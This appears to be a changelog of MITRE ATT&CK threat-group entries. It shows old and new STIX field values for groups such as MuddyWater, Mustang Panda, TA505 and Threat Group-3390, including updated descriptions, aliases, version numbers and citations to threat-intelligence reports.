external_references[5]['description'](Citation: IBM ITG18 2020)(Citation: Proofpoint TA453 March 2021)(Citation: Proofpoint TA453 July2021)(Citation: Check Point APT35 CharmPower January 2022)
external_references[6]['source_name']PhosphorusCOBALT ILLUSION
external_references[6]['description'](Citation: Microsoft Phosphorus Mar 2019)(Citation: Microsoft Phosphorus Oct 2020)(Citation: US District Court of DC Phosphorus Complaint 2019)(Citation: Certfa Charming Kitten January 2021)(Citation: Proofpoint TA453 March 2021)(Citation: Secureworks COBALT ILLUSION Threat Profile)
external_references[7]['source_name']NewscasterMagic Hound
external_references[7]['description']Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the older attack campaign called Newscaster (aka Newscasters).(Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018)(Citation: Unit 42 Magic Hound Feb 2017)
external_references[8]['source_name']APT35Microsoft Phosphorus Mar 2019
external_references[8]['description'](Citation: FireEye APT35 2018)(Citation: Certfa Charming Kitten January 2021)Burt, T. (2019, March 27). New steps to protect customers from hacking. Retrieved May 27, 2020.
external_references[9]['source_name']FireEye APT35 2018Microsoft Phosphorus Oct 2020
external_references[9]['description']Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018.Burt, T. (2020, October 28). Cyberattacks target international conference attendees. Retrieved March 8, 2021.
external_references[9]['url']https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdfhttps://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphorus-t20-munich-security-conference/
external_references[10]['source_name']ClearSky Kittens Back 3 August 2020Certfa Charming Kitten January 2021
external_references[10]['description']ClearSky Research Team. (2020, August 1). The Kittens Are Back in Town 3 - Charming Kitten Campaign Evolved and Deploying Spear-Phishing link by WhatsApp. Retrieved April 21, 2021.Certfa Labs. (2021, January 8). Charming Kitten’s Christmas Gift. Retrieved May 3, 2021.
external_references[10]['url']https://www.clearskysec.com/wp-content/uploads/2020/08/The-Kittens-are-Back-in-Town-3.pdfhttps://blog.certfa.com/posts/charming-kitten-christmas-gift/
external_references[11]['source_name']Certfa Charming Kitten January 2021Check Point APT35 CharmPower January 2022
external_references[11]['description']Certfa Labs. (2021, January 8). Charming Kitten’s Christmas Gift. Retrieved May 3, 2021.Check Point. (2022, January 11). APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit. Retrieved January 24, 2022.
external_references[11]['url']https://blog.certfa.com/posts/charming-kitten-christmas-gift/https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/
external_references[12]['source_name']Secureworks COBALT ILLUSION Threat ProfileClearSky Charming Kitten Dec 2017
external_references[12]['description']Secureworks. (n.d.). COBALT ILLUSION Threat Profile. Retrieved April 14, 2021.ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.
external_references[12]['url']https://www.secureworks.com/research/threat-profiles/cobalt-illusionhttp://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf
external_references[13]['source_name']Proofpoint TA453 July2021ClearSky Kittens Back 2 Oct 2019
external_references[13]['description']Miller, J. et al. (2021, July 13). Operation SpoofedScholars: A Conversation with TA453. Retrieved August 18, 2021.ClearSky Research Team. (2019, October 1). The Kittens Are Back in Town2 - Charming Kitten Campaign KeepsGoing on, Using New Impersonation Methods. Retrieved April 21, 2021.
external_references[13]['url']https://www.proofpoint.com/us/blog/threat-insight/operation-spoofedscholars-conversation-ta453https://www.clearskysec.com/wp-content/uploads/2019/10/The-Kittens-Are-Back-in-Town-2-1.pdf
external_references[14]['source_name']Unit 42 Magic Hound Feb 2017ClearSky Kittens Back 3 August 2020
external_references[14]['description']Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.ClearSky Research Team. (2020, August 1). The Kittens Are Back in Town 3 - Charming Kitten Campaign Evolved and Deploying Spear-Phishing link by WhatsApp. Retrieved April 21, 2021.
external_references[14]['url']https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/https://www.clearskysec.com/wp-content/uploads/2020/08/The-Kittens-are-Back-in-Town-3.pdf
external_references[15]['source_name']Proofpoint TA453 March 2021Eweek Newscaster and Charming Kitten May 2014
external_references[15]['description']Miller, J. et al. (2021, March 30). BadBlood: TA453 Targets US and Israeli Medical Research Personnel in Credential Phishing Campaigns. Retrieved May 4, 2021.Kerner, S. (2014, May 29). Newscaster Threat Uses Social Media for Intelligence Gathering. Retrieved April 14, 2021.
external_references[15]['url']https://www.proofpoint.com/us/blog/threat-insight/badblood-ta453-targets-us-and-israeli-medical-research-personnel-credentialhttps://www.eweek.com/security/newscaster-threat-uses-social-media-for-intelligence-gathering
external_references[16]['source_name']ClearSky Charming Kitten Dec 2017Unit 42 Magic Hound Feb 2017
external_references[16]['description']ClearSky Cyber Security. (2017, December). Charming Kitten. Retrieved December 27, 2017.Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.
external_references[16]['url']http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdfhttps://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/
external_references[17]['source_name']Eweek Newscaster and Charming Kitten May 2014Newscaster
external_references[17]['description']Kerner, S. (2014, May 29). Newscaster Threat Uses Social Media for Intelligence Gathering. Retrieved April 14, 2021.Link analysis of infrastructure and tools revealed a potential relationship between Magic Hound and the older attack campaign called Newscaster (aka Newscasters).(Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018)
external_references[18]['source_name']ClearSky Kittens Back 2 Oct 2019FireEye APT35 2018
external_references[18]['description']ClearSky Research Team. (2019, October 1). The Kittens Are Back in Town2 - Charming Kitten Campaign KeepsGoing on, Using New Impersonation Methods. Retrieved April 21, 2021.Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018.
external_references[18]['url']https://www.clearskysec.com/wp-content/uploads/2019/10/The-Kittens-Are-Back-in-Town-2-1.pdfhttps://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf
external_references[19]['source_name']IBM ITG18 2020Proofpoint TA453 July2021
external_references[19]['description']Wikoff, A. Emerson, R. (2020, July 16). New Research Exposes Iranian Threat Group Operations. Retrieved March 8, 2021.Miller, J. et al. (2021, July 13). Operation SpoofedScholars: A Conversation with TA453. Retrieved August 18, 2021.
external_references[19]['url']https://securityintelligence.com/posts/new-research-exposes-iranian-threat-group-operations/https://www.proofpoint.com/us/blog/threat-insight/operation-spoofedscholars-conversation-ta453
external_references[20]['source_name']Microsoft Phosphorus Mar 2019Proofpoint TA453 March 2021
external_references[20]['description']Burt, T. (2019, March 27). New steps to protect customers from hacking. Retrieved May 27, 2020.Miller, J. et al. (2021, March 30). BadBlood: TA453 Targets US and Israeli Medical Research Personnel in Credential Phishing Campaigns. Retrieved May 4, 2021.
external_references[20]['url']https://blogs.microsoft.com/on-the-issues/2019/03/27/new-steps-to-protect-customers-from-hacking/https://www.proofpoint.com/us/blog/threat-insight/badblood-ta453-targets-us-and-israeli-medical-research-personnel-credential
external_references[21]['source_name']Microsoft Phosphorus Oct 2020Secureworks COBALT ILLUSION Threat Profile
external_references[21]['description']Burt, T. (2020, October 28). Cyberattacks target international conference attendees. Retrieved March 8, 2021.Secureworks. (n.d.). COBALT ILLUSION Threat Profile. Retrieved April 14, 2021.
external_references[21]['url']https://blogs.microsoft.com/on-the-issues/2020/10/28/cyberattacks-phosphorus-t20-munich-security-conference/https://www.secureworks.com/research/threat-profiles/cobalt-illusion
x_mitre_version4.05.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'IBM ITG18 2020', 'description': 'Wikoff, A. Emerson, R. (2020, July 16). New Research Exposes Iranian Threat Group Operations. Retrieved March 8, 2021.', 'url': 'https://securityintelligence.com/posts/new-research-exposes-iranian-threat-group-operations/'}
x_mitre_contributorsDaniyal Naeem, BT Security

[G0069] MuddyWater

Current version: 4.0

Version changed from: 3.0 → 4.0


Old Description
New Description
t1[MuddyWater](https://attack.mitre.org/groups/G0069) is an Irt1[MuddyWater](https://attack.mitre.org/groups/G0069) is a cyb
>anian threat group that has primarily targeted Middle Easter>er espionage group assessed to be a subordinate element with
>n nations, and has also targeted European and North American>in Iran's Ministry of Intelligence and Security (MOIS).(Cita
> nations. The group's victims are mainly in the telecommunic>tion: CYBERCOM Iranian Intel Cyber January 2022) Since at le
>ations, government (IT services), and oil sectors. Activity >ast 2017, [MuddyWater](https://attack.mitre.org/groups/G0069
>from this group was previously linked to [FIN7](https://atta>) has targeted a range of government and private organizatio
>ck.mitre.org/groups/G0046), but the group is believed to be >ns across sectors, including telecommunications, local gover
>a distinct group possibly motivated by espionage.(Citation: >nment, defense, and oil and natural gas organizations, in th
>Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater D>e Middle East, Asia, Africa, Europe, and North America.(Cita
>ec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: C>tion: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyW
>learSky MuddyWater June 2019)(Citation: Reaqta MuddyWater No>ater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citat
>vember 2017)>ion: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWa
 >ter November 2017)(Citation: DHS CISA AA22-055A MuddyWater F
 >ebruary 2022)(Citation: Talos MuddyWater Jan 2022)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Ozer Sarilar, @ozersarilar, STM', 'Daniyal Naeem, BT Security']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-26 22:30:05.308000+00:002022-10-17 12:43:55.847000+00:00
description[MuddyWater](https://attack.mitre.org/groups/G0069) is an Iranian threat group that has primarily targeted Middle Eastern nations, and has also targeted European and North American nations. The group's victims are mainly in the telecommunications, government (IT services), and oil sectors. Activity from this group was previously linked to [FIN7](https://attack.mitre.org/groups/G0046), but the group is believed to be a distinct group possibly motivated by espionage.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)[MuddyWater](https://attack.mitre.org/groups/G0069) is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).(Citation: CYBERCOM Iranian Intel Cyber January 2022) Since at least 2017, [MuddyWater](https://attack.mitre.org/groups/G0069) has targeted a range of government and private organizations across sectors, including telecommunications, local government, defense, and oil and natural gas organizations, in the Middle East, Asia, Africa, Europe, and North America.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Talos MuddyWater Jan 2022)
aliases[1]Earth Vetala Earth Vetala
external_references[1]['source_name']MuddyWaterMERCURY
external_references[1]['description'](Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: Anomali Static Kitten February 2021)
external_references[2]['source_name']Earth Vetala Static Kitten
external_references[2]['description'](Citation: Trend Micro Muddy Water March 2021)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)
external_references[3]['source_name']MERCURYTEMP.Zagros
external_references[3]['description'](Citation: Anomali Static Kitten February 2021)(Citation: FireEye MuddyWater Mar 2018)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)
external_references[4]['source_name']Static KittenSeedworm
external_references[4]['description'](Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)(Citation: Symantec MuddyWater Dec 2018)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)
external_references[5]['source_name']SeedwormEarth Vetala
external_references[5]['description'](Citation: Symantec MuddyWater Dec 2018)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)(Citation: Trend Micro Muddy Water March 2021)
external_references[6]['source_name']TEMP.ZagrosMuddyWater
external_references[6]['description'](Citation: FireEye MuddyWater Mar 2018)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)
external_references[7]['source_name']Unit 42 MuddyWater Nov 2017ClearSky MuddyWater Nov 2018
external_references[7]['description']Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.
external_references[7]['url']https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf
external_references[8]['source_name']Symantec MuddyWater Dec 2018ClearSky MuddyWater June 2019
external_references[8]['description']Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.ClearSky. (2019, June). Iranian APT group ‘MuddyWater’ Adds Exploits to Their Arsenal. Retrieved May 14, 2020.
external_references[8]['url']https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-grouphttps://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf
external_references[9]['source_name']ClearSky MuddyWater Nov 2018CYBERCOM Iranian Intel Cyber January 2022
external_references[9]['description']ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.Cyber National Mission Force. (2022, January 12). Iranian intel cyber suite of malware uses open source tools. Retrieved September 30, 2022.
external_references[9]['url']https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdfhttps://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/
external_references[10]['source_name']ClearSky MuddyWater June 2019DHS CISA AA22-055A MuddyWater February 2022
external_references[10]['description']ClearSky. (2019, June). Iranian APT group ‘MuddyWater’ Adds Exploits to Their Arsenal. Retrieved May 14, 2020.FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022.
external_references[10]['url']https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdfhttps://www.cisa.gov/uscert/ncas/alerts/aa22-055a
external_references[11]['source_name']Reaqta MuddyWater November 2017Unit 42 MuddyWater Nov 2017
external_references[11]['description']Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020.Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.
external_references[11]['url']https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/
external_references[12]['source_name']Trend Micro Muddy Water March 2021Talos MuddyWater Jan 2022
external_references[12]['description']Peretz, A. and Theck, E. (2021, March 5). Earth Vetala – MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021.Malhortra, A and Ventura, V. (2022, January 31). Iranian APT MuddyWater targets Turkish users via malicious PDFs, executables. Retrieved June 22, 2022.
external_references[12]['url']https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.htmlhttps://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html
external_references[14]['source_name']FireEye MuddyWater Mar 2018Trend Micro Muddy Water March 2021
external_references[14]['description']Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.Peretz, A. and Theck, E. (2021, March 5). Earth Vetala – MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021.
external_references[14]['url']https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.htmlhttps://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html
x_mitre_version3.04.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Reaqta MuddyWater November 2017', 'description': 'Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020.', 'url': 'https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/'}
external_references{'source_name': 'FireEye MuddyWater Mar 2018', 'description': 'Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.', 'url': 'https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html'}
external_references{'source_name': 'Symantec MuddyWater Dec 2018', 'description': 'Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.', 'url': 'https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group'}

[G0129] Mustang Panda

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1[Mustang Panda](https://attack.mitre.org/groups/G0129) is a t1[Mustang Panda](https://attack.mitre.org/groups/G0129) is a 
>China-based cyber espionage threat actor that was first obse>China-based cyber espionage threat actor that was first obse
>rved in 2017 but may have been conducting operations since a>rved in 2017 but may have been conducting operations since a
>t least 2014. [Mustang Panda](https://attack.mitre.org/group>t least 2014. [Mustang Panda](https://attack.mitre.org/group
>s/G0129) has targeted government entities, nonprofits, relig>s/G0129) has targeted government entities, nonprofits, relig
>ious, and other non-governmental organizations in the U.S., >ious, and other non-governmental organizations in the U.S., 
>Germany, Mongolia, Myanmar, Pakistan, and Vietnam, among oth>Europe, Mongolia, Myanmar, Pakistan, and Vietnam, among othe
>ers.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation>rs.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation:
>: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks > Anomali MUSTANG PANDA October 2019)(Citation: Secureworks B
>BRONZE PRESIDENT December 2019) >RONZE PRESIDENT December 2019) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 21:11:44.216000+00:002022-04-11 16:43:52.231000+00:00
description[Mustang Panda](https://attack.mitre.org/groups/G0129) is a China-based cyber espionage threat actor that was first observed in 2017 but may have been conducting operations since at least 2014. [Mustang Panda](https://attack.mitre.org/groups/G0129) has targeted government entities, nonprofits, religious, and other non-governmental organizations in the U.S., Germany, Mongolia, Myanmar, Pakistan, and Vietnam, among others.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019) [Mustang Panda](https://attack.mitre.org/groups/G0129) is a China-based cyber espionage threat actor that was first observed in 2017 but may have been conducting operations since at least 2014. [Mustang Panda](https://attack.mitre.org/groups/G0129) has targeted government entities, nonprofits, religious, and other non-governmental organizations in the U.S., Europe, Mongolia, Myanmar, Pakistan, and Vietnam, among others.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019)
external_references[3]['description'](Citation: Recorded Future REDDELTA July 2020)(Citation: Recorded Future REDDELTA July 2020)(Citation: Proofpoint TA416 Europe March 2022)
external_references[5]['source_name']Crowdstrike MUSTANG PANDA June 2018Anomali MUSTANG PANDA October 2019
external_references[5]['description']Meyers, A. (2018, June 15). Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA. Retrieved April 12, 2021.Anomali Threat Research. (2019, October 7). China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021.
external_references[5]['url']https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations
external_references[6]['source_name']Anomali MUSTANG PANDA October 2019Secureworks BRONZE PRESIDENT December 2019
external_references[6]['description']Anomali Threat Research. (2019, October 7). China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021.Counter Threat Unit Research Team. (2019, December 29). BRONZE PRESIDENT Targets NGOs. Retrieved April 13, 2021.
external_references[6]['url']https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizationshttps://www.secureworks.com/research/bronze-president-targets-ngos
external_references[7]['source_name']Secureworks BRONZE PRESIDENT December 2019Recorded Future REDDELTA July 2020
external_references[7]['description']Counter Threat Unit Research Team. (2019, December 29). BRONZE PRESIDENT Targets NGOs. Retrieved April 13, 2021.Insikt Group. (2020, July 28). CHINESE STATE-SPONSORED GROUP ‘REDDELTA’ TARGETS THE VATICAN AND CATHOLIC ORGANIZATIONS. Retrieved April 13, 2021.
external_references[7]['url']https://www.secureworks.com/research/bronze-president-targets-ngoshttps://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdf
external_references[8]['source_name']Proofpoint TA416 November 2020Crowdstrike MUSTANG PANDA June 2018
external_references[8]['description']Proofpoint Threat Research Team. (2020, November 23). TA416 Goes to Ground and Returns with a Golang PlugX Malware Loader. Retrieved April 13, 2021.Meyers, A. (2018, June 15). Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA. Retrieved April 12, 2021.
external_references[8]['url']https://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loaderhttps://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/
external_references[9]['source_name']Recorded Future REDDELTA July 2020Proofpoint TA416 November 2020
external_references[9]['description']Insikt Group. (2020, July 28). CHINESE STATE-SPONSORED GROUP ‘REDDELTA’ TARGETS THE VATICAN AND CATHOLIC ORGANIZATIONS. Retrieved April 13, 2021.Proofpoint Threat Research Team. (2020, November 23). TA416 Goes to Ground and Returns with a Golang PlugX Malware Loader. Retrieved April 13, 2021.
external_references[9]['url']https://go.recordedfuture.com/hubfs/reports/cta-2020-0728.pdfhttps://www.proofpoint.com/us/blog/threat-insight/ta416-goes-ground-and-returns-golang-plugx-malware-loader
x_mitre_version1.12.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Proofpoint TA416 Europe March 2022', 'description': 'Raggi, M. et al. (2022, March 7). The Good, the Bad, and the Web Bug: TA416 Increases Operational Tempo Against European Governments as Conflict in Ukraine Escalates. Retrieved March 16, 2022.', 'url': 'https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european'}

[G0092] TA505

Current version: 2.0

Version changed from: 1.3 → 2.0


Old Description
New Description
t1[TA505](https://attack.mitre.org/groups/G0092) is a financiat1[TA505](https://attack.mitre.org/groups/G0092) is a cyber cr
>lly motivated threat group that has been active since at lea>iminal group that has been active since at least 2014. [TA50
>st 2014. The group is known for frequently changing malware >5](https://attack.mitre.org/groups/G0092) is known for frequ
>and driving global trends in criminal malware distribution.(>ently changing malware, driving global trends in criminal ma
>Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA>lware distribution, and ransomware campaigns involving [Clop
>505 June 2018)(Citation: Proofpoint TA505 Jan 2019)>](https://attack.mitre.org/software/S0611).(Citation: Proofp
 >oint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(C
 >itation: Proofpoint TA505 Jan 2019)(Citation: NCC Group TA50
 >5)(Citation: Korean FSI TA505 2020)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 20:27:57.195000+00:002022-10-13 16:17:20.601000+00:00
description[TA505](https://attack.mitre.org/groups/G0092) is a financially motivated threat group that has been active since at least 2014. The group is known for frequently changing malware and driving global trends in criminal malware distribution.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)[TA505](https://attack.mitre.org/groups/G0092) is a cyber criminal group that has been active since at least 2014. [TA505](https://attack.mitre.org/groups/G0092) is known for frequently changing malware, driving global trends in criminal malware distribution, and ransomware campaigns involving [Clop](https://attack.mitre.org/software/S0611).(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: NCC Group TA505)(Citation: Korean FSI TA505 2020)
external_references[2]['source_name']Proofpoint TA505 Sep 2017Korean FSI TA505 2020
external_references[2]['description']Proofpoint Staff. (2017, September 27). Threat Actor Profile: TA505, From Dridex to GlobeImposter. Retrieved May 28, 2019.Financial Security Institute. (2020, February 28). Profiling of TA505 Threat Group That Continues to Attack the Financial Sector. Retrieved July 14, 2022.
external_references[2]['url']https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposterhttps://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1382.do?page=1&column=&search=&searchSDate=&searchEDate=&bbsDataCategory=
external_references[3]['source_name']Proofpoint TA505 June 2018IBM TA505 April 2020
external_references[3]['description']Proofpoint Staff. (2018, June 8). TA505 shifts with the times. Retrieved May 28, 2019.Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020.
external_references[3]['url']https://www.proofpoint.com/us/threat-insight/post/ta505-shifts-timeshttps://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/
external_references[4]['source_name']Proofpoint TA505 Jan 2019Proofpoint TA505 Sep 2017
external_references[4]['description']Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019.Proofpoint Staff. (2017, September 27). Threat Actor Profile: TA505, From Dridex to GlobeImposter. Retrieved May 28, 2019.
external_references[4]['url']https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta505-dridex-globeimposter
external_references[5]['source_name']IBM TA505 April 2020Proofpoint TA505 June 2018
external_references[5]['description']Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020.Proofpoint Staff. (2018, June 8). TA505 shifts with the times. Retrieved May 28, 2019.
external_references[5]['url']https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/https://www.proofpoint.com/us/threat-insight/post/ta505-shifts-times
x_mitre_version1.32.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Proofpoint TA505 Jan 2019', 'description': 'Schwarz, D. and Proofpoint Staff. (2019, January 9). ServHelper and FlawedGrace - New malware introduced by TA505. Retrieved May 28, 2019.', 'url': 'https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505'}
external_references{'source_name': 'NCC Group TA505', 'description': 'Terefos, A. (2020, November 18). TA505: A Brief History of Their Time. Retrieved July 14, 2022.', 'url': 'https://research.nccgroup.com/2020/11/18/ta505-a-brief-history-of-their-time/'}

[G0027] Threat Group-3390

Current version: 2.0

Version changed from: 1.5 → 2.0


Old Description
New Description
t1[Threat Group-3390](https://attack.mitre.org/groups/G0027) it1[Threat Group-3390](https://attack.mitre.org/groups/G0027) i
>s a Chinese threat group that has extensively used strategic>s a Chinese threat group that has extensively used strategic
> Web compromises to target victims. (Citation: Dell TG-3390)> Web compromises to target victims.(Citation: Dell TG-3390) 
> The group has been active since at least 2010 and has targe>The group has been active since at least 2010 and has target
>ted organizations in the aerospace, government, defense, tec>ed organizations in the aerospace, government, defense, tech
>hnology, energy, and manufacturing sectors. (Citation: Secur>nology, energy, manufacturing and gambling/betting sectors.(
>eWorks BRONZE UNION June 2017) (Citation: Securelist LuckyMo>Citation: SecureWorks BRONZE UNION June 2017)(Citation: Secu
>use June 2018)>relist LuckyMouse June 2018)(Citation: Trend Micro DRBContro
 >l February 2020)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Daniyal Naeem, BT Security', 'Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage
values_changed
STIX FieldOld valueNew Value
